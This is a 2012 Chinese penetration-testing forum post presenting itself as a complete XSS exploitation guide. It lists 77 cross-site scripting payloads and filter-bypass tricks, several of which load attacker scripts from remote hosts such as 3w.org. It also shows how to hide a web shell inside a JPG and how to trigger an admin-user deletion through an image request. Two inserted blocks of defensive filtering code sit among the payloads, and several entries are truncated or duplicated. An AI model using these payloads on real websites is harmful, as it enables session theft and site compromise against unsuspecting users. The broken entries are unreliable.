中国网络渗透测试联盟
Title: Complete Guide to XSS Exploitation, Part 1
Author: admin
Time: 2012-9-13 17:04

Cross-site image shell

XSS cross-site code: <script>alert("")</script>

Put the code on the first line of the shell, change the shell into JPG image format, and when the image-format shell is accessed, our shell still executes.
(1) Plain XSS JavaScript injection

<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(2) IMG tag XSS using a JavaScript directive

<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(3) IMG tag, no semicolon, no quotes

<IMG SRC=javascript:alert('XSS')>

(4) IMG tag, case insensitive

<IMG SRC=JaVaScRiPt:alert('XSS')>

(5) HTML entity encoding (semicolons required)

<IMG SRC=javascript:alert("XSS")>

(6) Malformed IMG tag

<IMG """><SCRIPT>alert("XSS")</SCRIPT>">

(7) fromCharCode (calculator)

<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

(8) UTF-8 Unicode encoding (calculator)

<IMG SRC=jav..omitted..S')>
(9) 7-digit UTF-8 Unicode encoding, without semicolons (calculator)

<IMG SRC=jav..omitted..S')>

(10) Hex encoding, also without semicolons (calculator)

<IMG SRC=java..omitted..XSS')>

(11) Embedded tab, splitting up "javascript"

<IMG SRC="jav ascript:alert('XSS');">

(12) Embedded encoded tab, splitting up "javascript"

<IMG SRC="jav ascript:alert('XSS');">

(13) Embedded newline

<IMG SRC="jav ascript:alert('XSS');">

(14) Embedded carriage return

<IMG SRC="jav ascript:alert('XSS');">

(15) Multi-line embedded JavaScript injection; an extreme XSS example

<IMG SRC="javascript:alert('XSS')">

(16) Working around character limits (all pieces must be on the same page)

<script>z='document.'</script>
<script>z=z+'write("'</script>
<script>z=z+'<script'</script>
<script>z=z+' src=ht'</script>
<script>z=z+'tp://ww'</script>
<script>z=z+'w.shell'</script>
<script>z=z+'.net/1.'</script>
<script>z=z+'js></sc'</script>
<script>z=z+'ript>")'</script>
<script>eval(z)</script>
(17) Null byte

perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out

(18) Null byte 2. Null bytes are basically useless domestically, because there is nowhere to use them.

perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out

(19) Spaces and meta characters before the JavaScript in the IMG tag

<IMG SRC=" javascript:alert('XSS');">
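As an added defensive example (not part of the original post): entries (3) to (19) all beat filters that look for the literal text "javascript:" before the browser has normalised the attribute value. The check below normalises first (numeric entity decoding with or without semicolons, removal of tab/CR/LF/NUL and other control characters, case folding) and then allow-lists the scheme; the function names canonicalizeUrl and isDangerousUrl are mine.

```javascript
// Added example (not from the original post). Entries (3)-(19) defeat
// filters that look for the literal text "javascript:" before the browser
// has normalised the attribute value. Normalise first, then allow-list the
// scheme. Function names (canonicalizeUrl, isDangerousUrl) are mine.

// Numeric character references, decimal or hex, with or without the
// trailing ';' (entries (8)-(10) depend on the missing-semicolon forms).
const NUMERIC_ENTITY_RE = /&#(x[0-9a-f]+|[0-9]+);?/gi;

function decodeNumericEntities(s) {
  return s.replace(NUMERIC_ENTITY_RE, (_, num) => {
    const isHex = num[0] === 'x' || num[0] === 'X';
    const cp = isHex ? parseInt(num.slice(1), 16) : parseInt(num, 10);
    return cp <= 0x10ffff ? String.fromCodePoint(cp) : '';
  });
}

// Browsers discard tab, CR and LF anywhere in a URL and trim leading
// controls/spaces; old IE also ignored NUL (entry (17)). Dropping every
// code point <= 0x20 is the conservative superset of those behaviours.
function canonicalizeUrl(raw) {
  return decodeNumericEntities(String(raw))
    .replace(/[\u0000-\u0020]/g, '')
    .toLowerCase();
}

const ALLOWED_SCHEMES = new Set(['http', 'https', 'mailto']);

// True when a URL-valued attribute (SRC, HREF, BACKGROUND, ...) should be
// rejected: it carries a scheme that is not on the allow-list, e.g.
// javascript:, vbscript: (entry (40)) or data:. Scheme-less relative
// URLs are accepted.
function isDangerousUrl(raw) {
  const url = canonicalizeUrl(raw);
  const m = /^([a-z][a-z0-9+.-]*):/.exec(url);
  if (!m) return false; // relative URL, no scheme
  return !ALLOWED_SCHEMES.has(m[1]);
}
```

Note that a relative URL like "localhost:8080/x" is flagged because its first label parses as a scheme; resolve relative URLs against the page origin before calling the check if that matters.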
(20) Non-alpha-non-digit XSS

<SCRIPT/XSS SRC="http://3w.org/XSS/xss.js"></SCRIPT>

(21) Non-alpha-non-digit XSS, part 2

<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>

(22) Non-alpha-non-digit XSS, part 3

<SCRIPT/SRC="http://3w.org/XSS/xss.js"></SCRIPT>

(23) Double open brackets

<<SCRIPT>alert("XSS");//<</SCRIPT>

(24) No closing script tag (Firefox and similar browsers only)

<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
(25) No closing script tag 2

<SCRIPT SRC=//3w.org/XSS/xss.js>

(26) Half-open HTML/JavaScript XSS

<IMG SRC="javascript:alert('XSS')"

(27) Double open angle brackets

<iframe src=http://3w.org/XSS.html <

(28) No single quotes, double quotes or semicolons

<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>

(29) Escaping JavaScript escapes

\";alert('XSS');//

(30) Closing the TITLE tag

</TITLE><SCRIPT>alert("XSS");</SCRIPT>

(31) Input Image

<INPUT SRC="javascript:alert('XSS');">

(32) BODY Image

<BODY BACKGROUND="javascript:alert('XSS')">

(33) BODY tag

<BODY('XSS')>
(34) IMG Dynsrc

<IMG DYNSRC="javascript:alert('XSS')">

(35) IMG Lowsrc

<IMG LOWSRC="javascript:alert('XSS')">

(36) BGSOUND

<BGSOUND SRC="javascript:alert('XSS');">

(37) STYLE sheet

<LINK REL="stylesheet" HREF="javascript:alert('XSS');">

(38) Remote style sheet

<LINK REL="stylesheet" HREF="http://3w.org/xss.css">

(39) List-style-image

<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS

(40) IMG VBscript

<IMG SRC='vbscript:msgbox("XSS")'>

(41) META with link URL

<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">

(42) Iframe

<IFRAME SRC="javascript:alert('XSS');"></IFRAME>

(43) Frame

<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
(44) Table

<TABLE BACKGROUND="javascript:alert('XSS')">

(45) TD

<TABLE><TD BACKGROUND="javascript:alert('XSS')">

(46) DIV background-image

<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(47) DIV background-image with extra characters inserted (1-32, 34, 39, 160, 8192-8, 13, 12288, 65279)

<DIV STYLE="background-image: url( javascript:alert('XSS'))">

(48) DIV expression

<DIV STYLE="width: expression(alert('XSS'));">

(49) STYLE attribute with a split-up expression

<IMG STYLE="xss:expression(alert('XSS'))">

(50) Anonymous tag with a STYLE attribute (anything made of an open angle bracket followed by a letter)

<XSS STYLE="xss:expression(alert('XSS'))">

(51) STYLE background-image

<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>

(52) IMG STYLE method

exppression(alert("XSS"))'>

(53) STYLE background

<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>

(54) BASE

<BASE HREF="javascript:alert('XSS');//">
(55) EMBED tag: you can embed a Flash file that contains the XSS

<EMBED SRC="http://3w.org/XSS/xss.swf"></EMBED>

(56) Using ActionScript inside the Flash file, you can smuggle in your XSS code

a="get";
b="URL(\"";
c="javascript:";
d="alert('XSS');\")";
eval(a+b+c+d);

(57) XML namespace. The .HTC file must be on the same server as your XSS payload

<HTML xmlns:xss>
<?import namespace="xss" implementation="http://3w.org/XSS/xss.htc">
<xss:xss>XSS</xss:xss>
</HTML>

(58) If your JS is filtered, you can put the JS code inside an image and load it from there

<SCRIPT SRC=""></SCRIPT>

(59) IMG embedded command; can execute arbitrary commands

<IMG SRC="http://www.XXX.com/a.php?a=b">

(60) IMG embedded command (a.jpg on the same server)

Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser
(61) Bypassing symbol filtering

<SCRIPT a=">" SRC="http://3w.org/xss.js"></SCRIPT>

(62)

<SCRIPT =">" SRC="http://3w.org/xss.js"></SCRIPT>

(63)

<SCRIPT a=">" " SRC="http://3w.org/xss.js"></SCRIPT>

(64)

<SCRIPT "a='>'" SRC="http://3w.org/xss.js"></SCRIPT>

(65)

<SCRIPT a=`>` SRC="http://3w.org/xss.js"></SCRIPT>

(66)

<SCRIPT a=">'>" SRC="http://3w.org/xss.js"></SCRIPT>

(67)

<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://3w.org/xss.js"></SCRIPT>
(68) URL bypass

<A HREF="http://127.0.0.1/">XSS</A>

(69) URL encoding

<A HREF="http://3w.org">XSS</A>

(70) IP as decimal

<A HREF="http://3232235521">XSS</A>

(71) IP as hexadecimal

<A HREF="http://0xc0.0xa8.0x00.0x01">XSS</A>

(72) IP as octal

<A HREF="http://0300.0250.0000.0001">XSS</A>

(73) Mixed encoding

<A HREF="h tt p://6 6.000146.0x7.147/">XSS</A>
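As an added defensive example (not part of the original post): entries (70) to (73) are one address written in different legacy IPv4 notations, so a host allow/deny list must canonicalise before comparing strings. The function below (canonicalIPv4, my name) does that for the spellings shown; the sample hosts are those entries with the embedded whitespace of entry (73) already stripped.

```javascript
// Added example (not from the original post). Entries (70)-(73) spell one
// address several ways so a string compare against a host list misses it.
// canonicalIPv4 (my name) reduces classic inet_aton spellings to dotted
// decimal: 1-4 dot-separated parts, each decimal, octal (leading 0) or hex
// (leading 0x); the last part fills all remaining bytes.

function parseLegacyPart(part) {
  let m;
  if ((m = /^0[xX]([0-9a-fA-F]*)$/.exec(part))) return m[1] === '' ? 0 : parseInt(m[1], 16);
  if ((m = /^0([0-7]+)$/.exec(part))) return parseInt(m[1], 8);
  if (/^[0-9]+$/.test(part)) return parseInt(part, 10);
  return NaN; // a DNS label or junk, not a number
}

// Returns "a.b.c.d", or null when the host is not an IPv4 spelling.
function canonicalIPv4(host) {
  const parts = host.split('.');
  if (parts.length > 4) return null;
  const nums = parts.map(parseLegacyPart);
  if (nums.some(Number.isNaN)) return null;
  // Every part except the last is exactly one byte.
  if (nums.slice(0, -1).some((n) => n > 255)) return null;
  const last = nums[nums.length - 1];
  const lastBytes = 5 - nums.length; // the last part covers 4, 3, 2 or 1 bytes
  if (last >= 2 ** (8 * lastBytes)) return null;
  let value = 0;
  for (const n of nums.slice(0, -1)) value = value * 256 + n;
  value = value * 2 ** (8 * lastBytes) + last;
  return [24, 16, 8, 0].map((s) => Math.floor(value / 2 ** s) % 256).join('.');
}
```

WHATWG-conformant URL parsers (including Node's URL class) perform the same reduction when given a full URL; this version shows the rule itself and works on a bare host string taken from any log or header.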
(74) Omitting [http:]

<A HREF="//www.google.com/">XSS</A>

(75) Omitting [www]

<A HREF="http://google.com/">XSS</A>

(76) Absolute DNS name with a trailing dot

<A HREF="http://www.google.com./">XSS</A>

(77) javascript: link

<A HREF="javascript:document.location='http://www.google.com/'">XSS</A>

Welcome to 中国网络渗透测试联盟 (https://cobjon.com/)